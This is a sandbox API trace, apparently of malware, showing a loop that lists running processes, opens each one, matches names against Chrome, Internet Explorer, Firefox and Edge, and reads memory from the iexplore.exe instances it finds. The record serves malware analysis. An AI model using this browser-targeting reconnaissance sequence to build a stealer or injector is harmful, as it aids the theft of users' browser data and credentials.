	[0245.984] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0245.985] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x9448
	[0245.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.985] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0245.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.986] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.986] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0245.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.987] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.987] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0245.988] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x944c
	[0245.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.988] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0245.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.988] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.989] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0245.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.989] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.989] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0245.990] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x9450
	[0245.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.990] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0245.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.990] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.990] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0245.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.991] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.991] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0245.992] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x9454
	[0245.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.992] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0245.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.992] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.993] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0245.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.993] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.994] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0245.994] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x9458
	[0245.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.994] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0245.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.995] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.996] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0245.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.996] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.997] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0245.998] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x945c
	[0245.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.998] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0245.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.999] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.999] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0246.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.000] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.000] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0246.001] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x9460
	[0246.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.001] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0246.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.002] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.002] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0246.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.003] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.003] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0246.004] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x9464
	[0246.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.005] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0246.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.005] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.005] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0246.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.006] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.006] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0246.007] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x9468
	[0246.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.007] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0246.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.007] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0246.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.008] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0246.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.008] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.008] NtQueryInformationProcess (in: ProcessHandle=0x9468, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0246.008] ReadProcessMemory (in: hProcess=0x9468, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0246.008] ReadProcessMemory (in: hProcess=0x9468, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0246.009] ReadProcessMemory (in: hProcess=0x9468, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0246.009] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0246.009] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0246.009] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x946c
	[0246.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.010] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0246.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.010] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0246.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.010] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0246.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.011] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.011] NtQueryInformationProcess (in: ProcessHandle=0x946c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0246.011] ReadProcessMemory (in: hProcess=0x946c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0246.011] ReadProcessMemory (in: hProcess=0x946c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0246.011] ReadProcessMemory (in: hProcess=0x946c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0246.011] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0246.011] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0246.012] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x9470
	[0246.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.012] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0246.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.014] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.014] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0246.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.015] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.015] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0246.016] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x9474
	[0246.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.016] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0246.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.016] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.016] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0246.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.017] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.017] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.018] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x9478
	[0246.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.018] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.018] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.019] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.019] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.019] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.020] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.021] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x947c
	[0246.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.021] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.021] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.021] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.022] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.022] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.023] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x9480
	[0246.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.023] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.023] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.024] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.024] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.024] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0246.025] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x9484
	[0246.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.025] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0246.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.025] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.026] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0246.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.026] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.026] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.027] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x9488
	[0246.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.027] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.028] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.028] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.030] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.031] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.032] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x948c
	[0246.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.032] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.032] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.032] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.033] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.033] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0246.034] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x9490
	[0246.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.034] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0246.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.034] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.035] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0246.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.035] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.035] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0246.036] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x9494
	[0246.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.036] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.036] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.037] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.037] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.037] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0246.038] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x9498
	[0246.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.038] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0246.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.038] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.039] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0246.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.039] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.039] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.040] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x949c
	[0246.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.040] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.040] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.041] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.041] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.041] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0246.042] CloseHandle (hObject=0x4fd0) returned 1
	[0246.042] Sleep (dwMilliseconds=0x64) 
	[0246.139] GetCurrentProcessId () returned 0x110
	[0246.139] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
